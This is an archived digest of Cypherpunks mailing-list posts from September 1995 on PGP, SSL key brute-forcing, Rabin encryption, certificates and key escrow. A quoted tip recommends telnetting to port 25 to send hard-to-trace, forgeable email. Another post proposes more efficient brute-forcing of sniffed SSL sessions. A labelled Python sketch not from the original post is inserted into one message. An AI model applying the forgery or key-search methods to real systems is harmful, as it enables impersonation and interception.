URL: http://home.netscape.com/info/sslref.html

If anyone knows of any clones or foreign sources please speak up.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMElX4cLa+QKZS485AQERIQL/SBZAOAdAWSzfl/W9GNfDEU7e+3pBua5s
z84iGGuT5CfCGM4X5rYGKV4DuRVfFPyNQc++bn8SpPgyenbvBK+gc6400FHVskr3
Y4HAlBTqSSoyfOUHlhnEAs63nsjDGdFM
=ihYg
-----END PGP SIGNATURE-----

fRee cRyPTo! jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39)
June 7&14, 1995: 1st amendment repealed.
Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
PS: my failure to lament violations of ITAR should not be confused with actual involvement in criminal activity. Heh heh heh.
Catchyalater

From monty.harder at famend.com Sun Sep 3 01:45:44 1995
From: monty.harder at famend.com (MONTY HARDER)
Date: Sun, 3 Sep 95 01:45:44 PDT
Subject: O.J. ObCrypto: Fuhrman's Folly Fans Fakery Fears...
Message-ID: <8B0556B.00030003E0.uuout@famend.com>

RA> separate step/pass) Encrypt the Signed Message (IOW is E+S just a short cut
RA> for the two processes done in sequence using the same key for both

The only way that -es uses the same key for both the encryption and signature is if I have EncryptToSelf turned on, or I explicitly specify my signature key as one of the recipients.
My privkey is used for the signature, but =your= pubkey is used for the encryption.

* A dork with a modem can become a dork with a modem and an Internet address.
--- * Monster at FAmend.Com *

From Cybie at cris.com Sun Sep 3 02:07:59 1995
From: Cybie at cris.com (Cybie at cris.com)
Date: Sun, 3 Sep 95 02:07:59 PDT
Subject: Direct Socket to Remailer?
In-Reply-To:
Message-ID: <9509030907.AA04231@mariner.cris.com>

> > At 7:25 PM 9/1/95, ROBO Mixmaster Remailer wrote:
> >I've heard of telnetting to port 25 to send SEMI-untraceable e-mail.
> >The procedure, quite frankly, sounds rather complicated.
> >
>
> You should try the telnet port 25 trick. It is amazingly simple (but not
> secure). Just "telnet some.machine.com 25" and type help. It will guide you
> through it. It is quite informative.
>
> -Lance

Before you do it, make sure your ISP doesn't mind you telneting to port 25. VCU's computer dept. doesn't take too kindly to it. They're worried about people sending forged e-mail. (I was tempted to tell the guy when I got caught doing it that they should put a copy of PGP online for folks to use. But I just wanted my account re-instated.)

From perry at piermont.com Sun Sep 3 02:23:04 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 3 Sep 95 02:23:04 PDT
Subject: Basic Public key algorithms.
In-Reply-To:
Message-ID: <199509030031.UAA29612@frankenstein.piermont.com>

Ben writes:
> > Daniel R. Oelke writes:
> > > I could use RSA (which is well described in many sources, and has
> > > RSAREF out there), but I want to avoid the patent issue if possible.
> > > The sci.crypt FAQ mentions that there are other methods but that
> > > is about all it says. Are there any that are not patented?
> >
> > No, because one patent covers public key cryptography itself, and not
> > a particular method.
>
> Point of information--I'm not flaming you Perry, but Public Key Partners
> claims that their patent covers all forms of Public Key Crypto.
How is this at all different from what I just said?

.pm

From anon-remailer at utopia.hacktic.nl Sun Sep 3 02:50:21 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Sun, 3 Sep 95 02:50:21 PDT
Subject: Crypto '95: Robert Morris
Message-ID: <199509030950.LAA15691@utopia.hacktic.nl>

So Robert Morris worked for NSA.
Does that mean that the infamous 1988 Internet Worm was part of a NSA-sponsored intelligence-gathering mission?

From Andrew.Spring at ping.be Sun Sep 3 03:04:39 1995
From: Andrew.Spring at ping.be (Andrew Spring)
Date: Sun, 3 Sep 95 03:04:39 PDT
Subject: sums with BIG numbers
Message-ID:

Deranged Mutant wrote:
>>
>What do you mean? How big numbers are added (trivially easier than
>multiplication
>or division) or how it handles numbers that are too large for the variable's
>size?

and Ray Cromwell wrote :

To add two bignums, P(x) and Q(x) simply sum coefficients of like terms like you would with any polynomial addition, with one simple modification. If a_k is the coefficient of the x^k term of P(x), and etc, etc.

Just a quick clarification, people: In the UK, and, presumably Australia, "doing sums" refers to performing any kind of arithmetic, not just addition.

And to Sherry Mayo: Don't give up on the code, just yet. Try running it and watching it with a debugger.

From lyalc at ozemail.com.au Sun Sep 3 04:45:46 1995
From: lyalc at ozemail.com.au (lyal collins)
Date: Sun, 3 Sep 95 04:45:46 PDT
Subject: A bold ssl idea ?
Message-ID: <199509031145.VAA12843@oznet02.ozemail.com.au>

Having watched the discussions of recent of the SSL bruting, it occurred to me that a variation could also be useful.

I understand that setting up RC4 keys is slower than testing for the correct key (I may have misunderstood this bit).

As a company using SSL can have all its SSL traffic sniffed, from multiple people accessing, a log can easily be built of message/keys.
Is it considered practical to modify the brutessl code to have multiple message data, and test each against a key from allocated key space ?

If so, this may mean that perhaps 3 messages can be tested against a single in the time two single keys could be tested against one message.

As an attack scenario, this is a hell of a lot more "efficient" than current trials have been.

I realise this could also be considered a bit of target for the main purpose of demonstrating weaknesses, and improving techniques.

My thoughts, anyway - I hope they make sense.

lyal

From jya at pipeline.com Sun Sep 3 05:35:15 1995
From: jya at pipeline.com (John Young)
Date: Sun, 3 Sep 95 05:35:15 PDT
Subject: 260_xxx
Message-ID: <199509031235.IAA19851@pipe4.nyc.pipeline.com>

9-3-95. NYPaper:

"It's a Hacker Meeting, So Hide Your Phones."

Razor and Curious George showed up. Angstrom and Tigerboy and Cameo came, Rebel and Master Chemist, and the revered Emmanuel Goldstein. And there were dozens more, the illicit apparatus for filching pay-phone calls secreted deep in the pockets of shredded jeans, the hand-held Newton minicomputers at the ready. It was a time for all prudent people to hide their cellular phones and guard their calling cards, and for those who despise Nynex, Bell Atlantic and AT&T to rejoice. Because the electronic virtuosos in the public lobby of the Citicorp building at 53d Street and Lexington Avenue were networking to share clever and highly illegal ways of fooling the phone system and the corporate computer guard dogs meant to keep them out.

260_xxx

From jya at pipeline.com Sun Sep 3 05:38:29 1995
From: jya at pipeline.com (John Young)
Date: Sun, 3 Sep 95 05:38:29 PDT
Subject: ARS_tug
Message-ID: <199509031238.IAA19949@pipe4.nyc.pipeline.com>

9-3-95. NYPaper:

"Aircraft Carrier May Give Way To Missile Ship."
The aircraft carrier may soon be shoved off center stage by a new "arsenal ship" that would be able to rain 500 missiles within a matter of minutes on targets hundreds of miles away, without risking pilots' lives. A carrier costs $4.5 billion to build and $440 million a year to operate. The new ship, essentially a floating missile barge, might cost only $500 million and just tens of millions a year to run. The new ship would fire Tomahawk cruise missiles, long-range artillery shells or rocket barrages against ammunition dumps, command posts and artillery. It could prove particularly valuable in the early stages of a crisis, before ground troops were in place. It would travel with other ships and submarines for protection, and target information would be provided by other vessels, reconnaissance aircraft, pilotless drones or ground spotters. The 825-foot ship might require fewer than 20 people to operate, compared with the 5,000 aboard a 1,040-foot carrier.

ARS_tug

From ab411 at detroit.freenet.org Sun Sep 3 05:53:33 1995
From: ab411 at detroit.freenet.org (David R. Conrad)
Date: Sun, 3 Sep 95 05:53:33 PDT
Subject: Florida Drivers Permits and a Hello
Message-ID: <199509031253.IAA23207@detroit.freenet.org>

-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart writes:
>At 08:41 PM 8/29/95 -0400, [ I, Dave Conrad ] wrote:
>>One benefit to law enforcement, quite apart from the ability to verify a
>>license, would be the accumulation of a database of thumbprints of all
>>citizens, or at least all those who drive.
>
>They can get that by just collecting it when you get the license (which CA
>does), without having to cram it onto the back of the license.

Obviously, but I think many people would resist it if they collect it just for the sake of collecting it. But if they say they are collecting it to put on the license in order to verify licenses "in the field", then the collection will be a lot more palatable to a lot more people.
Have people in CA complained much that they collect it when you get the license?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEmhsxEcrOJethBVAQHFqQP9HvbaGMe4pQhlH1EsS9MKuC1L2+DlnXLb
lhkzJ9OJHRBJ7lN437I2W04ec0YRZXv3vf3Y3CMlYD1w09Ih54ugZYWzQbG7meu/
SHikLH0KVz86RlCUi5qzCrX3Zs+sFXTvkTSJ5t7G7o24/wpxxB2hy+4NBedTPp3o
yYWrn+p0sRU=
=mzOJ
-----END PGP SIGNATURE-----

--
David R. Conrad, ab411 at detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad at grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995. Requiescat in pace.

From johnl at radix.net Sun Sep 3 07:58:54 1995
From: johnl at radix.net (John A. Limpert)
Date: Sun, 3 Sep 95 07:58:54 PDT
Subject: Crypto '95: Robert Morris
Message-ID: <199509031457.KAA21322@saltmine.radix.net>

At 11:50 AM 9/3/95 +0200, you wrote:
>So Robert Morris worked for NSA.
>Does that mean that the infamous 1988 Internet Worm
>was part of a NSA-sponsored intelligence-gathering mission?

Robert Morris Jr. wrote the worm. His father, Robert Morris Sr. worked for the NSA.

--
John A. Limpert
johnl at Radix.Net

From hfinney at shell.portal.com Sun Sep 3 08:18:22 1995
From: hfinney at shell.portal.com (hfinney at shell.portal.com)
Date: Sun, 3 Sep 95 08:18:22 PDT
Subject: Slightly faster checking for encrypted messages to me
Message-ID: <199509031517.IAA26595@jobe.shell.portal.com>

One idea we have often discussed is to use a public message pool such as a newsgroup or mailing list reflector as a means of receiving messages anonymously. Each message would be encrypted with my public key (or that of my pseudonym), but with the identifying information stripped. Then I need to scan them all to see which ones are encrypted to me. Those are the ones which decrypt under the public key system to a correctly padded session key. Doing it this way eavesdroppers can't even tell how much mail my nym is receiving.
The problem is that doing a PK decrypt is time consuming, and if we had to do it to all the anonymous mail traffic in the world it could become impractical. I had hoped that Shamir's idea which I posted earlier would help with this, but I can't see an application. His idea helps to check for specific signatures, which is a thing anyone can do, but he lets you do it faster. We need a faster way to do a check which only the holder of the secret key can do.

I have thought of a small improvement based on Shamir's ideas, though. Use Rabin encryption rather than RSA. In this system the decryption involves taking square roots. This is done by taking the square root of the ciphertext mod p and q (the two secret primes) and using the Chinese Remainder Theorem to get the square root mod n. (This is also done in RSA with eth roots.) If p and q are 3 mod 4, you can get the square root of x mod p as x^((p+1)/4) mod p. This is done for p and q and you then combine them. So the amount of work is pretty much the same as for RSA.

However a speedup is possible to do a quicker check for a validly formed encrypted message. The idea is that the encrypted message is of the form M^2 mod n. This means that it is a quadratic residue mod n, and also therefore a q.r. mod p and q. So the speedup is simply to check whether it is a q.r. mod one of the primes and to reject it if not. This takes about half the amount of time to actually try the decryption. All valid messages will pass the test, and half of the invalid messages will be rejected. So this is not very strong, but it is perhaps better than nothing. Maybe Shamir will come up with some idea for this problem.

As I wrote before, testing for a q.r. is done by raising to the (p-1)/2 power mod p, and seeing if the answer is 1. I think this can be done in such a way that if it does come out to be 1 we can use our intermediate results to calculate the (p+1)/4 needed for the square root very quickly.
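[Added example, not part of Hal's post or any project's code: a Python sketch of the Rabin "is it for me?" filter he describes. The q.r. test mod p is done by computing the candidate root c^((p+1)/4) mod p and squaring it, which is one way to realise his remark about reusing the intermediate result; the toy primes, the tag and the padding format are constructed for the example.]

```python
"""Rabin pool filter: reject pool entries that cannot be for this key using one
exponentiation mod p, then run the full CRT decryption only on survivors.

Added example, not from the post.  Key sizes, TAG and the padding layout
(16-bit tag || 32-bit session key) are constructed assumptions.
"""
from math import isqrt
import random

TAG = 0x5241       # constructed redundancy: lets us recognise the right root
KEY_BITS = 32      # constructed session-key width


def is_prime(n: int) -> bool:
    """Deterministic trial division; adequate for the ~37-bit toy primes here."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    for d in range(3, isqrt(n) + 1, 2):
        if n % d == 0:
            return False
    return True


def blum_prime_after(start: int) -> int:
    """First prime >= start with p = 3 (mod 4), so sqrt(x) = x^((p+1)/4) mod p."""
    p = start | 3              # force the low two bits: p % 4 == 3
    while not is_prime(p):
        p += 4                 # stepping by 4 keeps p % 4 == 3
    return p


class RabinKey:
    def __init__(self, p: int, q: int):
        assert p % 4 == 3 and q % 4 == 3 and p != q
        self.p, self.q, self.n = p, q, p * q
        # CRT coefficients, computed once per key (cp = 1 mod p, 0 mod q; cq vice versa)
        self.cp = q * pow(q, -1, p)
        self.cq = p * pow(p, -1, q)

    def encrypt(self, session_key: int) -> int:
        """Sender side: c = m^2 mod n with m = TAG || session_key."""
        m = (TAG << KEY_BITS) | session_key
        assert 0 < m < self.n
        return m * m % self.n

    def root_mod_p(self, c: int):
        """Hal's cheap filter.  One exponentiation mod p gives the candidate
        root y; c is a quadratic residue mod p iff y^2 == c (mod p).  On a hit
        y is returned and reused by decrypt(), so the work is not wasted."""
        y = pow(c % self.p, (self.p + 1) // 4, self.p)
        return y if y * y % self.p == c % self.p else None

    def decrypt(self, c: int):
        """Full decryption: roots mod p and q, CRT-combined into the four square
        roots mod n.  Returns the session key from the root carrying TAG, or
        None if the entry was not addressed to this key."""
        rp = self.root_mod_p(c)
        if rp is None:                       # filtered out: not a q.r. mod p
            return None
        rq = pow(c % self.q, (self.q + 1) // 4, self.q)
        if rq * rq % self.q != c % self.q:   # second half of the q.r. test
            return None
        for sp in (rp, self.p - rp):
            for sq in (rq, self.q - rq):
                m = (sp * self.cp + sq * self.cq) % self.n
                if m >> KEY_BITS == TAG:
                    return m & ((1 << KEY_BITS) - 1)
        return None


def rejection_rate(key: RabinKey, samples: int, seed: int = 1) -> float:
    """Fraction of random (not-for-me) pool entries the p-side filter discards
    before any full decryption; about one half, as the post predicts."""
    rng = random.Random(seed)
    rejected = sum(key.root_mod_p(rng.randrange(1, key.n)) is None
                   for _ in range(samples))
    return rejected / samples


def demo_key() -> RabinKey:
    """Constructed toy key from two ~37-bit Blum primes; real keys are far larger."""
    return RabinKey(blum_prime_after(1 << 36), blum_prime_after(3 << 36))


if __name__ == "__main__":
    key = demo_key()
    c = key.encrypt(0xDEADBEEF)
    print("passes filter:", key.root_mod_p(c) is not None)
    print("recovered key:", hex(key.decrypt(c)))
    print("random entries rejected:", rejection_rate(key, 2000))
```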
Also, BTW Rabin encryption is not specifically patented, only the relatively-untested and almost-expired patent which covers all public key systems (with the failed knapsack algorithm as its specific embodiment) would supposedly prevent its use. However even PKP is apparently becoming more reluctant to throw its weight around on this patent, while they are still quite possessive about RSA. So perhaps a migration to Rabin is in order.

Hal

From shamrock at netcom.com Sun Sep 3 08:19:46 1995
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:19:46 PDT
Subject: Crypto '95: Robert Morris
Message-ID:

At 11:50 9/3/95, Name Withheld by Request wrote:
>So Robert Morris worked for NSA.
>Does that mean that the infamous 1988 Internet Worm
>was part of a NSA-sponsored intelligence-gathering mission?

The worm was released by his son.

--
Lucky Green
PGP encrypted mail preferred.

From shamrock at netcom.com Sun Sep 3 08:19:49 1995
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:19:49 PDT
Subject: Florida Drivers Permits and a Hello
Message-ID:

At 8:53 9/3/95, David R. Conrad wrote:
>Obviously, but I think many people would resist it if they collect it just
>for the sake of collecting it. But if they say they are collecting it to
>put on the license in order to verify licenses "in the field", then the
>collection will be a lot more palatable to a lot more people.
>
>Have people in CA complained much that they collect it when you get the
>license?

The masses never complain. Fingerprints on driver licenses, pictures on credit cards, and the soon to be mandatory medical monitoring devices that continually check your bloodstream for toxins are for _your_ protection. People demand more, not less, supervision. The government will gladly oblige.

--
Lucky Green
PGP encrypted mail preferred.

From Piete.Brooks at cl.cam.ac.uk Sun Sep 3 08:25:01 1995
From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks)
Date: Sun, 3 Sep 95 08:25:01 PDT
Subject: A bold ssl idea ?
In-Reply-To: <199509031145.VAA12843@oznet02.ozemail.com.au>
Message-ID: <"swan.cl.cam.:180200:950903143250"@cl.cam.ac.uk>

> I understand that setting up RC4 keys is slower than testing for the correct
> key (I may have misunderstood this bit).

For pure RC4, Yes. However, SSL is not pure RC4.

> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?

You are the third person I've heard think of this.
[ The first did quite a lot of calculations before spotting the problem ! ]

> If so, this may mean that perhaps 3 messages can be tested against a single
> in the time two single keys could be tested against one message.

Well, the original suggestion I heard was to try 64K at a time :-))

From jya at pipeline.com Sun Sep 3 08:25:23 1995
From: jya at pipeline.com (John Young)
Date: Sun, 3 Sep 95 08:25:23 PDT
Subject: PEE_per
Message-ID: <199509031244.IAA20069@pipe4.nyc.pipeline.com>

9-3-95. NYPaper:

"500,000 Clients, No Branches. Phone Banking Is Catching On."

Bankers from around the world are making the pilgrimage to Leeds in the north of England for a miracle cure at their stagnant industry's equivalent of a Lourdes. Here is First Direct, a bank with half a million customers and not a single branch. It is the world's leading telephone-only bank; it is the fastest-growing bank in Britain. On the walls are sports stadium scoreboards, constantly flashing the number of customers on hold and how long they have been waiting. While a banker serves a customer, his computer screen is displaying all sorts of personal information about her. "No Adverse Risk" flashes at the top, indicating that the bank would be glad to loan her money. Also displayed is the fact that she is a 30-year-old single renter with a job as a project manager, along with a list of all the bank's prior contacts with her.
PEE_per

From shamrock at netcom.com Sun Sep 3 08:38:02 1995
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 08:38:02 PDT
Subject: hks cypherpunks newsserver down
Message-ID:

nntp.hks.net's cypherpunks mail -> news gateway has not shown new messages for more than a week. Strangely, only the cp list seems to be affected. Anyone know what's up?

-- Lucky Green
PGP encrypted mail preferred.

From bigdaddy at ccnet.com Sun Sep 3 10:09:37 1995
From: bigdaddy at ccnet.com (bigdaddy at ccnet.com)
Date: Sun, 3 Sep 95 10:09:37 PDT
Subject: Direct Socket to Remailer?
In-Reply-To: <9509030907.AA04231@mariner.cris.com>
Message-ID:

On Sun, 3 Sep 1995 Cybie at cris.com wrote:

> Before you do it, make sure your ISP doesn't mind you telneting to port 25.
> VCU's computer dept. doesn't take too kindly to it. They're worried about
> people sending forged e-mail. (I was tempted to tell the guy when I got
> caught doing it that they should put a copy of PGP online for folks to use.
> But I just wanted my account re-instated.)

CMU's systems, for instance, are nice enough to explicitly warn you 'Mis-identifying the sender is an abuse of computing resources.' on their machines' port 25. I take this to imply that they don't take kindly to such use of their machines by students or non-students...but what they would do to a non-CMU student is not clear.

Come to think of it, would there be legal issues involved in forging e-mail addresses? Can one have a reasonable expectation of identity in ordinary e-mail? Probably not. How about mail authenticated with PGP, RIPEM, Notes, or a similar system?

We've seen key certification by VeriSign, among others...and, if we assume a certification structure which requires checking the True Name of the person, then we have a link between the key and the identity. All well and good.
If we add key escrow to this certification structure, or require a True Name for *all* keys, then one could have 'identity escrow'...a situation in which pseudonymous keys can be created and distributed with certification that they really belong to a (presumably unique) True Name. In the example of a bank with anonymous officers, their identities might be held by another organization (oversight committee, industry certification authority, etc.), and revealed in the event of an investigation. Doesn't VeriSign already sign 'Personality Certificates' (sorry if not the right term) for pseudonymous IDs?

Obviously, setting and enforcing limits on keys per person, should that be desirable, could be difficult. In the simplest case of one verified key and identity per person, an entity who can satisfy the verification process multiple times can be issued multiple keys. If there are a number of independent Certification Authorities, and assuming they don't cross-check, one could get as many keys as there are CAs. Lag time between, say, the Dhahran, Saudi Arabia office of the CA and the rest of the structure might also allow for two or more keys at once. There's probably a dozen different ways to fool a CA or group of CAs. Unfortunately, they're likely to be so difficult, and the penalties severe enough (e.g. permanent revocation of all keys with a particular CA), that few will use them.

I wonder if this sort of "feature" is already on tap for a Government Certification Authority in the U.S.. If pseudonymity is offered at all (perhaps as a sort of compromise), it seems reasonable that any State-sponsored CA would insist on identity escrow. The next logical step, of course, would be to subordinate, discredit, or outlaw other CAs, in order to minimize the 'possibility' of 'evil criminals' using the 'national information infrastructure' for 'nefarious acts of impersonation'.

Web-of-trust would probably still be legal.
It would be absurdity to even attempt to outlaw it, as one would hope the example of PGP has shown. One might as well outlaw gossip. Unfortunately, web-of-trust is rarely as extensive (at least for me) as a full-blown certification hierarchy. It is certainly more work. In effect, the State would reserve to itself the ability to certify keys on a large scale, on its terms.

Scary.

On the other hand, it could also make for some very interesting situations...such as a pseudonymous identity, accredited by the State, able to participate in elections, enter into binding contracts, and telecommute to work. Again, making sure no one registers and votes twice might be a bit of work. Perhaps down the line, such an identity could run for office. The line 'I'm With Stupid' takes on a whole new meaning...

David Molnar

P.S. Andrew L : Yes, I'm the same person you knew in Houston! Have you received the mail I sent you?

-Haynow

From perry at piermont.com Sun Sep 3 10:59:07 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 3 Sep 95 10:59:07 PDT
Subject: Crypto '95: Robert Morris
In-Reply-To: <199509030950.LAA15691@utopia.hacktic.nl>
Message-ID: <199509031758.NAA01453@frankenstein.piermont.com>

Name Withheld by Request writes:
> So Robert Morris worked for NSA.
> Does that mean that the infamous 1988 Internet Worm
> was part of a NSA-sponsored intelligence-gathering mission?

You have the junior and senior Robert Morris confused.

.pm

From mfroomki at umiami.ir.miami.edu Sun Sep 3 11:16:31 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Sun, 3 Sep 95 11:16:31 PDT
Subject: Mail to mail.cypherpunks "newsgroup" echoes to list
Message-ID:

I have been getting a load of duplicate mail from this group; not all messages are duplicated, only those cc'd to mail.cypherpunks as well as sent to the toad.com address. I don't know if this is a gateway to a local newsgroup or what, but I wish the duplication would stop. Thank you.

A.
Michael Froomkin             | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law   | mfroomki at umiami.ir.miami.edu
U. Miami School of Law       | P.O. Box 248087
                             | It's hot here. And humid.
Coral Gables, FL 33124 USA   | See (experimentally & erratically)
                             | http://viper.law.miami.edu/~mfroomki

---------- Forwarded message ----------
Date: Sun, 03 Sep 1995 08:38:54 -0600
From: Piete Brooks
To: lyal collins
Cc: cypherpunks at toad.com, Piete.Brooks at cl.cam.ac.uk
Newgroups: mail.cypherpunks
Subject: Re: A bold ssl idea ?

> I understand that setting up RC4 keys is slower than testing for the correct
> key (I may have misunderstood this bit).

For pure RC4, Yes. However, SSL is not pure RC4.

> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?

You are the third person I've heard think of this.
[ The first did quite a lot of calculations before spotting the problem ! ]

> If so, this may mean that perhaps 3 messages can be tested against a single
> in the time two single keys could be tested against one message.

Well, the original suggestion I heard was to try 64K at a time :-))

From bal at martigny.ai.mit.edu Sun Sep 3 11:36:26 1995
From: bal at martigny.ai.mit.edu (Brian A. LaMacchia)
Date: Sun, 3 Sep 95 11:36:26 PDT
Subject: Looking for NII IP "White Paper"...
Message-ID: <9509031836.AA23248@toad.com>

According to an article in Sunday's _Washington Post_ the final draft of the "Intellectual Property and the National Information Infrastructure" report is going to be released Tuesday morning. You may recall the preliminary draft of this report, a.k.a. the "Green Paper", and its proposed changes to U.S. Copyright Law.

Does anyone on the list have a copy of the final draft/"White Paper"? The administration is evidently keeping it under pretty tight wraps, probably because of the intense criticism the Green Paper received. Personally, I expect the White Paper to be just as bad.
--bal

References:

The Green Paper/Preliminary Draft is available at:
http://www.uspto.gov/niiip.html

Pam Samuelson's critique, which appeared in _Communications of the ACM_ and which you should definitely read, is available at:
http://www-swiss.ai.mit.edu/6095/articles/samuelson-nii-cacm-dec94.html

From pfarrell at isse.gmu.edu Sun Sep 3 11:39:09 1995
From: pfarrell at isse.gmu.edu (Pat Farrell)
Date: Sun, 3 Sep 95 11:39:09 PDT
Subject: WEB pointers for NIS&T Key Escrow meeting
Message-ID: <9509031838.AA01294@isse.gmu.edu>

To save list bandwidth, I've put the agenda, attendee list, and the three discussion topic papers for this week's Key Escrow meeting on my web.

url: http://www.isse.gmu.edu/~pfarrell/nistmeeting.html

I'll add anything else I get from NIS&T, and any pointers folks send my way.

Pat

Pat Farrell      grad student      http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request          #include standard.disclaimer

From Richard.Johnson at Colorado.EDU Sun Sep 3 12:26:51 1995
From: Richard.Johnson at Colorado.EDU (Richard Johnson)
Date: Sun, 3 Sep 95 12:26:51 PDT
Subject: Dumb Question: PGPfone over Appletalk
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>Can someone tell me how to run PGPfone over Appletalk ? The
>documentation says that support has been added for this release, and
>there's a preferences box to check to use it, but there's no information
>I can find in the documentation on how to initiate a call over
>Appletalk.. it just says to enter a telephone number to dial. If I
>press 'Connect' without entering anything it hangs up the Mac.
>
>How do I tell it which machine I want to connect to ?
>
> Mark "Don't know much about Macs" Grant

My guess is that you're on a network with multiple AppleTalk zones. The "PGPfone 1.0b4 README" file mentions a known bug that causes PGPfone to freeze when trying to bring up its AppleTalk Browser.
The Read Me file then goes on to explain how to connect anyway. Be sure to use a semi-colon, not a colon, between the zone name and the macintosh name...

Richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Sun Sep 3 12:49:19 1995
From: hfinney at shell.portal.com (Hal)
Date: Sun, 3 Sep 95 12:49:19 PDT
Subject: SSLRef (SSLtelnet)
Message-ID: <199509031948.MAA17974@jobe.shell.portal.com>

The link I used recently to get SSLREF is . I don't know what kind of export restrictions this enforces.

I was hoping to write a program which would sit on the user's PC and act as a proxy for Netscape's browser. It would connect using 128 bit SSL instead of 40 bit. The stumbling block is that Netscape won't connect to even the local proxy unless it sees a valid certificate, one signed by a CA that it accepts. For this application I would need such a certificate, and make the corresponding public and private keys public, hard-coding them into the proxy. Since the proxy runs on the same PC as the browser there is no need for confidentiality between them, and the secret key can be revealed.

Does anyone have an idea for a way to acquire a certificate acceptable to Netscape, perhaps one with a "broken key", that could be used for this purpose?

Hal

From hallam at w3.org Sun Sep 3 12:52:12 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sun, 3 Sep 95 12:52:12 PDT
Subject: ASN.1 and Kerberos version 5
In-Reply-To:
Message-ID: <9509031951.AA23373@zorch.w3.org>

I don't think that the concept of ASN.1 is as bad as Jeff makes out. If it worked then ASN.1 would be very very useful. But it just plain doesn't.
ASN.1 is worse than useless, it means that a very good idea is rendered unusable because of a badly botched implementation.

The ambiguities of the ASN.1 spec are at least as bad as Jeff makes out. I have attempted to implement an ASN.1 compiler but I have little confidence in its correctness because the structure of ASN.1 is so unwieldy. It is not just ANY that causes problems, IMPLICIT is a complete cock up.

ASN.1 is poor because it is unnecessarily complex, has little intellectual coherence and has been extended in a manner which conflicts with the original design principle.

Is it any coincidence that ASN.1 backwards is the name of a well known organisation? Also the only person who has defended ASN.1 to my face happened to work for that organisation once.

So the motto is: ASN.1 - Just say NO!

Phill

From rsnyder at janet.advsys.com Sun Sep 3 13:17:32 1995
From: rsnyder at janet.advsys.com (Bob Snyder)
Date: Sun, 3 Sep 95 13:17:32 PDT
Subject: SSLRef (SSLtelnet)
In-Reply-To: <199509031948.MAA17974@jobe.shell.portal.com>
Message-ID: <199509032018.QAA03382@janet.advsys.com>

hfinney at shell.portal.com said:
> Does anyone have an idea for a way to acquire a certificate
> acceptable to Netscape, perhaps one with a "broken key", that could
> be used for this purpose?

RSA will give out certificates to individuals; Apple includes a coupon for a free one with their MacOS 7.5 (and 7 Pro) release. There's a program for the Mac (RIPEM Mac) that will convert the keys returned into RIPEM usable PEM-format keys. Isn't that what SSL uses? The only question is what CAs are supported by the browser.... I think the Apple keys are under RSA's Unaffiliated User CA...

If there's interest, I'll look further into this.
Bob

From ylo at cs.hut.fi Sun Sep 3 13:32:00 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Sun, 3 Sep 95 13:32:00 PDT
Subject: SSLRef (SSLtelnet)
In-Reply-To: <199509030845.CAA00124@wero.byu.edu>
Message-ID: <199509032031.XAA22330@shadows.cs.hut.fi>

> URL: http://home.netscape.com/info/sslref.html
> If anyone knows of any clones or foreign sources please speak up.

SSLeay (Eric Young's free SSL implementation from Australia) is available from ftp.psy.uq.oz.au:/pub/Crypto/SSL.

For information on other cryptographic software available outside the United States, see http://www.cs.hut.fi/crypto.

Tatu

From shamrock at netcom.com Sun Sep 3 14:35:50 1995
From: shamrock at netcom.com (Lucky Green)
Date: Sun, 3 Sep 95 14:35:50 PDT
Subject: NIST attendee list
Message-ID:

The dangers of public attendee lists. Some Cypherpunk might match the list against east coast lawyers and break Black Unicorn's nym.

-- Lucky Green
PGP encrypted mail preferred.

From unicorn at access.digex.net Sun Sep 3 14:40:59 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Sun, 3 Sep 95 14:40:59 PDT
Subject: NIST attendee list
In-Reply-To:
Message-ID:

On Sun, 3 Sep 1995, Lucky Green wrote:

> Date: Sun, 3 Sep 1995 14:39:38 -0800
> From: Lucky Green
> To: cypherpunks at toad.com
> Subject: NIST attendee list
>
> The dangers of public attendee lists. Some Cypherpunk might match the list
> against east coast lawyers and break Black Unicorn's nym.
>

Luckily I've accounted for this.

> > -- Lucky Green
> PGP encrypted mail preferred.
>
>

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig!
*New Key Information* - Finger for key revocation and latest key update.

From Tim at alia1.demon.co.uk Sun Sep 3 15:15:52 1995
From: Tim at alia1.demon.co.uk (Tim Magee)
Date: Sun, 3 Sep 95 15:15:52 PDT
Subject: anyone know what this "top secret" code does?
Message-ID: <150@alia1.demon.co.uk>

In your message dated Saturday 2, September 1995 :
> Does anyone remember the scenario someone suggested awhile back that
> hypothesized a scheme by the NSA or other TLAs to encourage the use
> of WEAK crypto? It involved spreading a lot of F.U.D. about PGP and
> other strong crypto methods, followed by the discovery/leak of a
> supposedly "strong" crypto algorithm to replace it.

